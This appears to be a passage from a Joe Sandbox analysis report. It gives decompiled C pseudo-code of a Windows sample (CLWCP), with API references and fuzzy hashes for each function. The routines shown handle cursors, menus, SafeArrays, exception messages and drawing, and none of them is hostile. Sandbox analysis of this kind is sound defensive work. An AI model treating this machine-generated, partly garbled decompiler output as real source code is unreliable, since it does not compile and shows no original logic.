                                  
                                  				_t159 = __eax;
                                  				if( *0x470adc != 0) {
                                  					L3:
                                  					_t50 =  *0x470abc; // 0x0
                                  					_t51 =  *0x470abc; // 0x0
                                  					_t119 = E00432874(_t159,  *(_t51 + 0x9b) & 0x000000ff,  &_v28, _t50);
                                  					if( *0x470adc == 0) {
                                  						_t172 =  *0x470ae0;
                                  						if( *0x470ae0 != 0) {
                                  							_t108 =  *0x470ad0; // 0x0
                                  							_t109 = GetDesktopWindow();
                                  							_t110 =  *0x470ae0; // 0x0
                                  							E0043D55C(_t110, _t109, _t172, _t108);
                                  						}
                                  					}
                                  					_t54 =  *0x470abc; // 0x0
                                  					if( *((char*)(_t54 + 0x9b)) != 0) {
                                  						__eflags =  *0x470adc;
                                  						_t6 =  &_v24;
                                  						 *_t6 =  *0x470adc != 0;
                                  						__eflags =  *_t6;
                                  						 *0x470adc = 2;
                                  					} else {
                                  						 *0x470adc = 1;
                                  						_v24 = 0;
                                  					}
                                  					_t55 =  *0x470ac0; // 0x0
                                  					if(_t119 ==  *((intOrPtr*)(_t55 + 8))) {
                                  						L12:
                                  						_t56 =  *0x470ac0; // 0x0
                                  						 *((intOrPtr*)(_t56 + 0x10)) =  *_t159;
                                  						 *((intOrPtr*)(_t56 + 0x14)) =  *((intOrPtr*)(_t159 + 4));
                                  						_t57 =  *0x470ac0; // 0x0
                                  						if( *((intOrPtr*)(_t57 + 8)) != 0) {
                                  							_t99 =  *0x470ac0; // 0x0
                                  							E004346D0( *((intOrPtr*)(_t99 + 8)),  &_v20, _t159);
                                  							_t102 =  *0x470ac0; // 0x0
                                  							 *((intOrPtr*)(_t102 + 0x18)) = _v20;
                                  							 *((intOrPtr*)(_t102 + 0x1c)) = _v16;
                                  						}
                                  						_t135 = E004328C4(2);
                                  						_t61 =  *0x470ac0; // 0x0
                                  						_t162 =  *((intOrPtr*)( *_t61 + 4))( *((intOrPtr*)(_t159 + 4)));
                                  						if( *0x470ae0 == 0) {
                                  							L22:
                                  							_t63 =  *0x46fda0; // 0x470b44
                                  							_t66 = SetCursor(E00453F84( *_t63, _t162));
                                  							if( *0x470adc != 2) {
                                  								goto L33;
                                  							}
                                  							_t184 = _t119;
                                  							if(_t119 != 0) {
                                  								_t120 = E00432900();
                                  								_t68 =  *0x470ac0; // 0x0
                                  								 *((intOrPtr*)(_t68 + 0x60)) = _t120;
                                  								__eflags = _t120;
                                  								if(__eflags != 0) {
                                  									E004346D0(_t120,  &_v24, _t159);
                                  									_t66 = E00403594(_t120, __eflags);
                                  									_t139 =  *0x470ac0; // 0x0
                                  									 *(_t139 + 0x5c) = _t66;
                                  								} else {
                                  									_t79 =  *0x470ac0; // 0x0
                                  									_t66 = E00403594( *((intOrPtr*)(_t79 + 8)), __eflags);
                                  									_t144 =  *0x470ac0; // 0x0
                                  									 *(_t144 + 0x5c) = _t66;
                                  								}
                                  							} else {
                                  								_push( *((intOrPtr*)(_t159 + 4)));
                                  								_t81 =  *0x470ac0; // 0x0
                                  								_t66 = E00403594( *((intOrPtr*)(_t81 + 0x40)), _t184);
                                  							}
                                  							if( *0x470ac0 == 0) {
                                  								goto L33;
                                  							} else {
                                  								_t121 =  *0x470ac0; // 0x0
                                  								_t42 = _t121 + 0x64; // 0x64
                                  								_t43 = _t121 + 0x4c; // 0x4c
                                  								_t66 = E00407D98(_t43, 0x10, _t42);
                                  								if(_t66 != 0) {
                                  									goto L33;
                                  								}
                                  								if(_v28 != 0) {
                                  									_t76 =  *0x470ac0; // 0x0
                                  									 *((intOrPtr*)( *_t76 + 0x34))();
                                  								}
                                  								_t73 =  *0x470ac0; // 0x0
                                  								 *((intOrPtr*)( *_t73 + 0x30))();
                                  								_t75 =  *0x470ac0; // 0x0
                                  								asm("movsd");
                                  								asm("movsd");
                                  								asm("movsd");
                                  								asm("movsd");
                                  								return _t75;
                                  							}
                                  						} else {
                                  							if(_t119 == 0 || ( *(_t119 + 0x51) & 0x00000020) != 0) {
                                  								L18:
                                  								_t83 =  *0x470ae0; // 0x0
                                  								E0043D538(_t83, _t162);
                                  								_t85 =  *0x470ae0; // 0x0
                                  								_t182 =  *((char*)(_t85 + 0x6a));
                                  								if( *((char*)(_t85 + 0x6a)) != 0) {
                                  									_t86 =  *0x470ae0; // 0x0
                                  									E0043D658(_t86,  *((intOrPtr*)(_t159 + 4)),  *_t159, __eflags);
                                  								} else {
                                  									_t89 = GetDesktopWindow();
                                  									_t90 =  *0x470ae0; // 0x0
                                  									E0043D55C(_t90, _t89, _t182,  *((intOrPtr*)(_t159 + 4)));
                                  								}
                                  								goto L22;
                                  							} else {
                                  								_t92 =  *0x470ac0; // 0x0
                                  								if( *((char*)(_t92 + 4)) == 0) {
                                  									_t93 =  *0x470ae0; // 0x0
                                  									E0043D6CC(_t93, _t135, __eflags);
                                  									_t95 =  *0x46fda0; // 0x470b44
                                  									SetCursor(E00453F84( *_t95, _t162));
                                  									goto L22;
                                  								}
                                  								goto L18;
                                  							}
                                  						}
                                  					} else {
                                  						_t66 = E004328C4(1);
                                  						if( *0x470ac0 == 0) {
                                  							L33:
                                  							return _t66;
                                  						}
                                  						_t104 =  *0x470ac0; // 0x0
                                  						 *((intOrPtr*)(_t104 + 8)) = _t119;
                                  						_t105 =  *0x470ac0; // 0x0
                                  						 *((intOrPtr*)(_t105 + 0xc)) = _v28;
                                  						_t106 =  *0x470ac0; // 0x0
                                  						 *((intOrPtr*)(_t106 + 0x10)) =  *_t159;
                                  						 *((intOrPtr*)(_t106 + 0x14)) =  *((intOrPtr*)(_t159 + 4));
                                  						_t66 = E004328C4(0);
                                  						if( *0x470ac0 == 0) {
                                  							goto L33;
                                  						}
                                  						goto L12;
                                  					}
                                  				}
                                  				_t112 =  *0x470acc; // 0x0
                                  				asm("cdq");
                                  				_t169 = (_t112 -  *__eax ^ __edx) - __edx -  *0x470ad8; // 0x0
                                  				if(_t169 >= 0) {
                                  					goto L3;
                                  				}
                                  				_t116 =  *0x470ad0; // 0x0
                                  				asm("cdq");
                                  				_t66 = (_t116 -  *((intOrPtr*)(__eax + 4)) ^ __edx) - __edx;
                                  				_t170 = _t66 -  *0x470ad8; // 0x0
                                  				if(_t170 < 0) {
                                  					goto L33;
                                  				}
                                  				goto L3;
                                  			}


















































                                  0x00432b3b
                                  0x00432b3f
                                  0x00432b5f
                                  0x00432b64
                                  0x00432b41
                                  0x00432b45
                                  0x00432b4e
                                  0x00432b53
                                  0x00432b53
                                  0x00000000
                                  0x00432b1f
                                  0x00432b1f
                                  0x00432b28
                                  0x00432b6b
                                  0x00432b70
                                  0x00432b78
                                  0x00432b85
                                  0x00000000
                                  0x00432b85
                                  0x00000000
                                  0x00432b28
                                  0x00432b17
                                  0x00432a65
                                  0x00432a67
                                  0x00432a73
                                  0x00432c79
                                  0x00432c79
                                  0x00432c79
                                  0x00432a79
                                  0x00432a7e
                                  0x00432a81
                                  0x00432a89
                                  0x00432a8c
                                  0x00432a93
                                  0x00432a99
                                  0x00432a9e
                                  0x00432aaa
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00432aaa
                                  0x00432a63
                                  0x004329b1
                                  0x004329b8
                                  0x004329bd
                                  0x004329c3
                                  0x00000000
                                  0x00000000
                                  0x004329c5
                                  0x004329cd
                                  0x004329d0
                                  0x004329d2
                                  0x004329d8
                                  0x00000000
                                  0x00000000
                                  0x00000000

                                  APIs
                                  • GetDesktopWindow.USER32 ref: 00432A15
                                  • GetDesktopWindow.USER32 ref: 00432B45
                                  • SetCursor.USER32(00000000), ref: 00432B9A
                                    • Part of subcall function 0043D6CC: 73451770.COMCTL32(00000000,?,00432B75), ref: 0043D6E8
                                  • SetCursor.USER32(00000000), ref: 00432B85
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CursorDesktopWindow$73451770
                                  • String ID:
                                  • API String ID: 1277058964-0
                                  • Opcode ID: 9bf921f9aa4056971e9bfa9237737fb84cd97ee4621af0c44d1d2d3d36ef77e5
                                  • Instruction ID: 4df4feac2710ae1df8f4326747be23c6cf5b3c1064a22c5f7127f32f540e700e
                                  • Opcode Fuzzy Hash: 9bf921f9aa4056971e9bfa9237737fb84cd97ee4621af0c44d1d2d3d36ef77e5
                                  • Instruction Fuzzy Hash: 9E915D74602341CFC704DF29D984E16B7E1BBA9304F09917AE449CB7A6C7B8EC85CB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 82%
                                  			E0040EA40(signed short* __eax) {
                                  				char _v260;
                                  				char _v768;
                                  				char _v772;
                                  				signed short* _v776;
                                  				signed short* _v780;
                                  				char _v784;
                                  				signed int _v788;
                                  				char _v792;
                                  				intOrPtr* _v796;
                                  				signed char _t43;
                                  				intOrPtr* _t60;
                                  				void* _t79;
                                  				void* _t81;
                                  				void* _t84;
                                  				void* _t85;
                                  				intOrPtr* _t92;
                                  				void* _t96;
                                  				char* _t97;
                                  				void* _t98;
                                  
                                  				_v776 = __eax;
                                  				if((_v776[0] & 0x00000020) == 0) {
                                  					E0040E90C(0x80070057);
                                  				}
                                  				_t43 =  *_v776 & 0x0000ffff;
                                  				if((_t43 & 0x00000fff) == 0xc) {
                                  					if((_t43 & 0x00000040) == 0) {
                                  						_v780 = _v776[4];
                                  					} else {
                                  						_v780 =  *(_v776[4]);
                                  					}
                                  					_v788 =  *_v780 & 0x0000ffff;
                                  					_t79 = _v788 - 1;
                                  					if(_t79 >= 0) {
                                  						_t85 = _t79 + 1;
                                  						_t96 = 0;
                                  						_t97 =  &_v772;
                                  						do {
                                  							_v796 = _t97;
                                  							_push(_v796 + 4);
                                  							_t22 = _t96 + 1; // 0x1
                                  							_push(_v780);
                                  							L0040DB1C();
                                  							E0040E90C(_v780);
                                  							_push( &_v784);
                                  							_t25 = _t96 + 1; // 0x1
                                  							_push(_v780);
                                  							L0040DB24();
                                  							E0040E90C(_v780);
                                  							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
                                  							_t96 = _t96 + 1;
                                  							_t97 = _t97 + 8;
                                  							_t85 = _t85 - 1;
                                  						} while (_t85 != 0);
                                  					}
                                  					_t81 = _v788 - 1;
                                  					if(_t81 >= 0) {
                                  						_t84 = _t81 + 1;
                                  						_t60 =  &_v768;
                                  						_t92 =  &_v260;
                                  						do {
                                  							 *_t92 =  *_t60;
                                  							_t92 = _t92 + 4;
                                  							_t60 = _t60 + 8;
                                  							_t84 = _t84 - 1;
                                  						} while (_t84 != 0);
                                  						do {
                                  							goto L12;
                                  						} while (E0040E9E4(_t83, _t98) != 0);
                                  						goto L15;
                                  					}
                                  					L12:
                                  					_t83 = _v788 - 1;
                                  					if(E0040E9B4(_v788 - 1, _t98) != 0) {
                                  						_push( &_v792);
                                  						_push( &_v260);
                                  						_push(_v780);
                                  						L0040DB2C();
                                  						E0040E90C(_v780);
                                  						E0040EC38(_v792);
                                  					}
                                  				}
                                  				L15:
                                  				_push(_v776);
                                  				L0040D6B4();
                                  				return E0040E90C(_v776);
                                  			}

                                  APIs
                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040EAEF
                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040EB0B
                                  • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040EB82
                                  • VariantClear.OLEAUT32(?), ref: 0040EBAB
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: ArraySafe$Bound$ClearIndexVariant
                                  • String ID:
                                  • API String ID: 920484758-0
                                  • Opcode ID: 7abf1dbe01bfa80357a0a9f37415d43e99f2e6b632d8c353a54639f2791cf5fd
                                  • Instruction ID: 98a03a7dcd9f33bcf1f3be098a2c0c533de45232fa85f0bc8e653439391d6fff
                                  • Opcode Fuzzy Hash: 7abf1dbe01bfa80357a0a9f37415d43e99f2e6b632d8c353a54639f2791cf5fd
                                  • Instruction Fuzzy Hash: 2F413F75A0121D8FCB61DB5ACC80BD9B3BCAF48304F0045EAE549F7252DA38AF908F54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040B5E0(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
                                  				intOrPtr _v8;
                                  				intOrPtr _v12;
                                  				char _v273;
                                  				char _v534;
                                  				char _v790;
                                  				struct _MEMORY_BASIC_INFORMATION _v820;
                                  				char _v824;
                                  				intOrPtr _v828;
                                  				char _v832;
                                  				intOrPtr _v836;
                                  				char _v840;
                                  				intOrPtr _v844;
                                  				char _v848;
                                  				char* _v852;
                                  				char _v856;
                                  				char _v860;
                                  				char _v1116;
                                  				void* __edi;
                                  				struct HINSTANCE__* _t40;
                                  				intOrPtr _t51;
                                  				struct HINSTANCE__* _t53;
                                  				void* _t69;
                                  				void* _t73;
                                  				intOrPtr _t74;
                                  				intOrPtr _t83;
                                  				intOrPtr _t86;
                                  				intOrPtr* _t87;
                                  				void* _t93;
                                  
                                  				_t93 = __fp0;
                                  				_v8 = __ecx;
                                  				_t73 = __edx;
                                  				_t87 = __eax;
                                  				VirtualQuery(__edx,  &_v820, 0x1c);
                                  				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
                                  					_t40 =  *0x470664; // 0x400000
                                  					GetModuleFileNameA(_t40,  &_v534, 0x105);
                                  					_v12 = E0040B5D4(_t73);
                                  				} else {
                                  					_v12 = _t73 - _v820.AllocationBase;
                                  				}
                                  				E0040893C( &_v273, 0x104, E0040C5E8( &_v534, 0x5c) + 1);
                                  				_t74 = 0x40b760;
                                  				_t86 = 0x40b760;
                                  				_t83 =  *0x40703c; // 0x407088
                                  				if(E00403524(_t87, _t83) != 0) {
                                  					_t74 = E004045DC( *((intOrPtr*)(_t87 + 4)));
                                  					_t69 = E004088D8(_t74, 0x40b760);
                                  					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
                                  						_t86 = 0x40b764;
                                  					}
                                  				}
                                  				_t51 =  *0x46fd8c; // 0x406dbc
                                  				_t16 = _t51 + 4; // 0xffe8
                                  				_t53 =  *0x470664; // 0x400000
                                  				LoadStringA(E004051B8(_t53),  *_t16,  &_v790, 0x100);
                                  				E004032E8( *_t87,  &_v1116);
                                  				_v860 =  &_v1116;
                                  				_v856 = 4;
                                  				_v852 =  &_v273;
                                  				_v848 = 6;
                                  				_v844 = _v12;
                                  				_v840 = 5;
                                  				_v836 = _t74;
                                  				_v832 = 6;
                                  				_v828 = _t86;
                                  				_v824 = 6;
                                  				E00408F34(_v8,  &_v790, _a4, _t93, 4,  &_v860);
                                  				return E004088D8(_v8, _t86);
                                  			}

                                  APIs
                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040B5FD
                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040B621
                                  • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040B63C
                                  • LoadStringA.USER32 ref: 0040B6D2
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: FileModuleName$LoadQueryStringVirtual
                                  • String ID:
                                  • API String ID: 3990497365-0
                                  • Opcode ID: 53f1b1049f9f335a6b3069db278be823071f03a2bf5a6f8338bb79dce8fee9f3
                                  • Instruction ID: 95334cec29bb1404c72e32e0288f365d396286f3265917a73c8ce31bc4caf2e4
                                  • Opcode Fuzzy Hash: 53f1b1049f9f335a6b3069db278be823071f03a2bf5a6f8338bb79dce8fee9f3
                                  • Instruction Fuzzy Hash: BA4131709002589BDB21EB69CD85BDAB7FC9B18304F4040FAA548F7392D7799F848F59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040B5DE(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
                                  				intOrPtr _v8;
                                  				intOrPtr _v12;
                                  				char _v273;
                                  				char _v534;
                                  				char _v790;
                                  				struct _MEMORY_BASIC_INFORMATION _v820;
                                  				char _v824;
                                  				intOrPtr _v828;
                                  				char _v832;
                                  				intOrPtr _v836;
                                  				char _v840;
                                  				intOrPtr _v844;
                                  				char _v848;
                                  				char* _v852;
                                  				char _v856;
                                  				char _v860;
                                  				char _v1116;
                                  				void* __edi;
                                  				struct HINSTANCE__* _t40;
                                  				intOrPtr _t51;
                                  				struct HINSTANCE__* _t53;
                                  				void* _t69;
                                  				void* _t74;
                                  				intOrPtr _t75;
                                  				intOrPtr _t85;
                                  				intOrPtr _t89;
                                  				intOrPtr* _t92;
                                  				void* _t105;
                                  
                                  				_v8 = __ecx;
                                  				_t74 = __edx;
                                  				_t92 = __eax;
                                  				VirtualQuery(__edx,  &_v820, 0x1c);
                                  				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
                                  					_t40 =  *0x470664; // 0x400000
                                  					GetModuleFileNameA(_t40,  &_v534, 0x105);
                                  					_v12 = E0040B5D4(_t74);
                                  				} else {
                                  					_v12 = _t74 - _v820.AllocationBase;
                                  				}
                                  				E0040893C( &_v273, 0x104, E0040C5E8( &_v534, 0x5c) + 1);
                                  				_t75 = 0x40b760;
                                  				_t89 = 0x40b760;
                                  				_t85 =  *0x40703c; // 0x407088
                                  				if(E00403524(_t92, _t85) != 0) {
                                  					_t75 = E004045DC( *((intOrPtr*)(_t92 + 4)));
                                  					_t69 = E004088D8(_t75, 0x40b760);
                                  					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
                                  						_t89 = 0x40b764;
                                  					}
                                  				}
                                  				_t51 =  *0x46fd8c; // 0x406dbc
                                  				_t16 = _t51 + 4; // 0xffe8
                                  				_t53 =  *0x470664; // 0x400000
                                  				LoadStringA(E004051B8(_t53),  *_t16,  &_v790, 0x100);
                                  				E004032E8( *_t92,  &_v1116);
                                  				_v860 =  &_v1116;
                                  				_v856 = 4;
                                  				_v852 =  &_v273;
                                  				_v848 = 6;
                                  				_v844 = _v12;
                                  				_v840 = 5;
                                  				_v836 = _t75;
                                  				_v832 = 6;
                                  				_v828 = _t89;
                                  				_v824 = 6;
                                  				E00408F34(_v8,  &_v790, _a4, _t105, 4,  &_v860);
                                  				return E004088D8(_v8, _t89);
                                  			}

                                  APIs
                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040B5FD
                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040B621
                                  • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040B63C
                                  • LoadStringA.USER32 ref: 0040B6D2
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: FileModuleName$LoadQueryStringVirtual
                                  • String ID:
                                  • API String ID: 3990497365-0
                                  • Opcode ID: 325eb99e9d33ff581ee36609930eb5d9b5ff5929fbe289664a34b1e0916027b9
                                  • Instruction ID: a3a51aa19031e33d32acf0a3f0e696e99f7b117d10c439a904412c0467a576b0
                                  • Opcode Fuzzy Hash: 325eb99e9d33ff581ee36609930eb5d9b5ff5929fbe289664a34b1e0916027b9
                                  • Instruction Fuzzy Hash: 58415070A002589BDB21EB69CD81B9AB7FC9B18304F4040FAA548F7392D7799F848F59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 64%
                                  			E00421C30(intOrPtr __eax, void* __edx) {
                                  				intOrPtr _v8;
                                  				void* __ebx;
                                  				void* __ecx;
                                  				void* __esi;
                                  				void* __ebp;
                                  				intOrPtr _t33;
                                  				struct HDC__* _t47;
                                  				intOrPtr _t54;
                                  				intOrPtr _t58;
                                  				struct HDC__* _t66;
                                  				void* _t67;
                                  				intOrPtr _t76;
                                  				void* _t81;
                                  				intOrPtr _t82;
                                  				intOrPtr _t84;
                                  				intOrPtr _t86;
                                  
                                  				_t84 = _t86;
                                  				_push(_t67);
                                  				_v8 = __eax;
                                  				_t33 = _v8;
                                  				if( *((intOrPtr*)(_t33 + 0x58)) == 0) {
                                  					return _t33;
                                  				} else {
                                  					E0041E554(_v8);
                                  					_push(_t84);
                                  					_push(0x421d0f);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t86;
                                  					E00423044( *((intOrPtr*)(_v8 + 0x58)));
                                  					E00421AAC( *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8));
                                  					_t47 = E00423228( *((intOrPtr*)(_v8 + 0x58)));
                                  					_push(0);
                                  					L00406374();
                                  					_t66 = _t47;
                                  					_t81 =  *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8);
                                  					if(_t81 == 0) {
                                  						 *((intOrPtr*)(_v8 + 0x5c)) = 0;
                                  					} else {
                                  						 *((intOrPtr*)(_v8 + 0x5c)) = SelectObject(_t66, _t81);
                                  					}
                                  					_t54 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28));
                                  					_t82 =  *((intOrPtr*)(_t54 + 0x10));
                                  					if(_t82 == 0) {
                                  						 *((intOrPtr*)(_v8 + 0x60)) = 0;
                                  					} else {
                                  						_push(0xffffffff);
                                  						_push(_t82);
                                  						_push(_t66);
                                  						L004064E4();
                                  						 *((intOrPtr*)(_v8 + 0x60)) = _t54;
                                  						_push(_t66);
                                  						L004064B4();
                                  					}
                                  					E0041E958(_v8, _t66);
                                  					_t58 =  *0x46e6e0; // 0x20f0b60
                                  					E00414014(_t58, _t66, _t67, _v8, _t82);
                                  					_pop(_t76);
                                  					 *[fs:eax] = _t76;
                                  					_push(0x421d16);
                                  					return E0041E7C4(_v8);
                                  				}
                                  			}




















                                  APIs
                                    • Part of subcall function 0041E554: RtlEnterCriticalSection.KERNEL32(004708CC,00000000,0041CCC2,00000000,0041CD21), ref: 0041E55C
                                    • Part of subcall function 0041E554: RtlLeaveCriticalSection.KERNEL32(004708CC,004708CC,00000000,0041CCC2,00000000,0041CD21), ref: 0041E569
                                    • Part of subcall function 0041E554: RtlEnterCriticalSection.KERNEL32(00000038,004708CC,004708CC,00000000,0041CCC2,00000000,0041CD21), ref: 0041E572
                                    • Part of subcall function 00423228: 72E7AC50.USER32(00000000,?,?,?,?,00421C83,00000000,00421D0F), ref: 0042327E
                                    • Part of subcall function 00423228: 72E7AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,00421C83,00000000,00421D0F), ref: 00423293
                                    • Part of subcall function 00423228: 72E7AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,00421C83,00000000,00421D0F), ref: 0042329D
                                    • Part of subcall function 00423228: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00421C83,00000000,00421D0F), ref: 004232C1
                                    • Part of subcall function 00423228: 72E7B380.USER32(00000000,00000000,00000000,?,?,?,?,00421C83,00000000,00421D0F), ref: 004232CC
                                  • 72E7A590.GDI32(00000000,00000000,00421D0F), ref: 00421C85
                                  • SelectObject.GDI32(00000000,?), ref: 00421C9E
                                  • 72E7B410.GDI32(00000000,?,000000FF,00000000,00000000,00421D0F), ref: 00421CC7
                                  • 72E7B150.GDI32(00000000,00000000,?,000000FF,00000000,00000000,00421D0F), ref: 00421CD3
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CriticalSection$Enter$A590B150B380B410CreateHalftoneLeaveObjectPaletteSelect
                                  • String ID:
                                  • API String ID: 2198039625-0
                                  • Opcode ID: 797b201a8bf25ea2984713e6fdc8649c359e8b1494f4439d42eb416b83b2d59b
                                  • Instruction ID: 8339b486aee61e2cd3e6be662231ec73c450f738bb8f9089c8d6b71666ce1e56
                                  • Opcode Fuzzy Hash: 797b201a8bf25ea2984713e6fdc8649c359e8b1494f4439d42eb416b83b2d59b
                                  • Instruction Fuzzy Hash: 10310438B00618EFD704EF5ADA81D4DB7F5FF48714B6241A6A804AB372D638EE40DB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00449584(void* __eax, struct HMENU__* __edx, int _a4, int _a8, CHAR* _a12) {
                                  				intOrPtr _v8;
                                  				void* __ecx;
                                  				void* __edi;
                                  				int _t27;
                                  				void* _t40;
                                  				int _t41;
                                  				int _t50;
                                  
                                  				_t50 = _t41;
                                  				_t49 = __edx;
                                  				_t40 = __eax;
                                  				if(E00448A40(__eax) == 0) {
                                  					return GetMenuStringA(__edx, _t50, _a12, _a8, _a4);
                                  				}
                                  				_v8 = 0;
                                  				if((GetMenuState(__edx, _t50, _a4) & 0x00000010) == 0) {
                                  					_t27 = GetMenuItemID(_t49, _t50);
                                  					_t51 = _t27;
                                  					if(_t27 != 0xffffffff) {
                                  						_v8 = E004488BC(_t40, 0, _t51);
                                  					}
                                  				} else {
                                  					_t49 = GetSubMenu(_t49, _t50);
                                  					_v8 = E004488BC(_t40, 1, _t37);
                                  				}
                                  				if(_v8 == 0) {
                                  					return 0;
                                  				} else {
                                  					 *_a12 = 0;
                                  					E00408994(_a12, _a8,  *((intOrPtr*)(_v8 + 0x30)));
                                  					return E004088D8(_a12, _t49);
                                  				}
                                  			}











                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Menu$ItemStateString
                                  • String ID:
                                  • API String ID: 306270399-0
                                  • Opcode ID: 3e43f196225cfaa6c131155aea87cff4b6dfc03ce8244ecf0db90ca7bf47f49b
                                  • Instruction ID: 730118f3934a0f3e4bb88c58c95d6a057a4e8e8de3e8db02ad0b9ecb596fca21
                                  • Opcode Fuzzy Hash: 3e43f196225cfaa6c131155aea87cff4b6dfc03ce8244ecf0db90ca7bf47f49b
                                  • Instruction Fuzzy Hash: 5B117F31601214AFEB01EF2D8C81AAF77E89F49354B11446FF819D7381DA789D01A7A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0045503C(void* __eax, void* __ecx, char __edx) {
                                  				char _v12;
                                  				struct HWND__* _v20;
                                  				int _t17;
                                  				void* _t27;
                                  				struct HWND__* _t33;
                                  				void* _t35;
                                  				void* _t36;
                                  				long _t37;
                                  
                                  				_t37 = _t36 + 0xfffffff8;
                                  				_t27 = __eax;
                                  				_t17 =  *0x470b40; // 0x0
                                  				if( *((intOrPtr*)(_t17 + 0x30)) != 0) {
                                  					if( *((intOrPtr*)(__eax + 0x94)) == 0) {
                                  						 *_t37 =  *((intOrPtr*)(__eax + 0x30));
                                  						_v12 = __edx;
                                  						EnumWindows(E00454FCC, _t37);
                                  						_t5 = _t27 + 0x90; // 0x0
                                  						_t17 =  *_t5;
                                  						if( *((intOrPtr*)(_t17 + 8)) != 0) {
                                  							_t33 = GetWindow(_v20, 3);
                                  							_v20 = _t33;
                                  							if((GetWindowLongA(_t33, 0xffffffec) & 0x00000008) != 0) {
                                  								_v20 = 0xfffffffe;
                                  							}
                                  							_t10 = _t27 + 0x90; // 0x0
                                  							_t17 =  *_t10;
                                  							_t35 =  *((intOrPtr*)(_t17 + 8)) - 1;
                                  							if(_t35 >= 0) {
                                  								do {
                                  									_t13 = _t27 + 0x90; // 0x0
